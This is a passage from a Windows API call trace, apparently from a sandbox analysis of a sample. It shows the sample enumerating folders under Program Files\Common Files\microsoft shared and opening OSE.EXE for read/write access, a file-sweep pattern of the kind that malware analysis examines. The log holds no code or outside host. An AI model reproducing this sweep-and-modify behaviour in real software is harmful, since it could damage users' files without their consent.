files\\microsoft shared\\officesoftwareprotectionplatform"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.869] GetLastError () returned 0x5 [0101.869] GetLastError () returned 0x5 [0101.869] SetLastError (dwErrCode=0x5) [0101.869] GetLastError () returned 0x5 [0101.869] SetLastError (dwErrCode=0x5) [0101.869] GetLastError () returned 0x5 [0101.869] SetLastError (dwErrCode=0x5) [0101.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0101.869] AreFileApisANSI () returned 1 [0101.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0101.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0101.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8c998, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 80 [0101.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.869] GetLastError () returned 0x5 [0101.869] GetLastError () returned 0x5 [0101.869] SetLastError (dwErrCode=0x5) [0101.869] GetLastError () returned 0x5 [0101.870] SetLastError (dwErrCode=0x5) [0101.870] GetLastError () returned 0x5 [0101.870] SetLastError (dwErrCode=0x5) [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0101.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0101.870] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0101.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4b3b8 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0101.871] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0101.871] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.871] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0101.871] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b3b8 | out: hHeap=0x20000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0101.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0101.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.872] AreFileApisANSI () returned 1 [0101.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine", lpUsedDefaultChar=0x0) returned 61 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.872] AreFileApisANSI () returned 1 [0101.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0101.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0101.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 61 [0101.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.873] GetLastError () returned 0x5 [0101.873] GetLastError () returned 0x5 [0101.873] SetLastError (dwErrCode=0x5) [0101.873] GetLastError () returned 0x5 [0101.873] SetLastError (dwErrCode=0x5) [0101.873] GetLastError () returned 0x5 [0101.873] SetLastError (dwErrCode=0x5) [0101.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0101.873] AreFileApisANSI () returned 1 [0101.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0101.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ecf0 [0101.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 61 [0101.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.873] GetLastError () returned 0x5 [0101.873] GetLastError () returned 0x5 [0101.873] SetLastError (dwErrCode=0x5) [0101.873] GetLastError () returned 0x5 [0101.873] SetLastError (dwErrCode=0x5) [0101.873] GetLastError () returned 0x5 [0101.873] SetLastError (dwErrCode=0x5) [0101.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.874] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0101.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0101.874] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77f90 [0101.875] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.875] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3ba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSE.EXE", cAlternateFileName="")) returned 1 [0101.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0101.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0101.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0101.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0101.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0101.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0101.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0101.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0101.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0101.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.876] AreFileApisANSI () returned 1 [0101.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE", lpUsedDefaultChar=0x0) returned 69 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0101.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0101.876] AreFileApisANSI () returned 1 [0101.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0101.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0101.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.877] GetFileType (hFile=0x27c) returned 0x1 [0101.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.877] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.877] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.877] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.877] CloseHandle (hObject=0x27c) returned 1 [0101.877] AreFileApisANSI () returned 1 [0101.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0101.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0101.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.878] GetFileType (hFile=0x27c) returned 0x1 [0101.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.946] CloseHandle (hObject=0x27c) returned 1 [0101.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 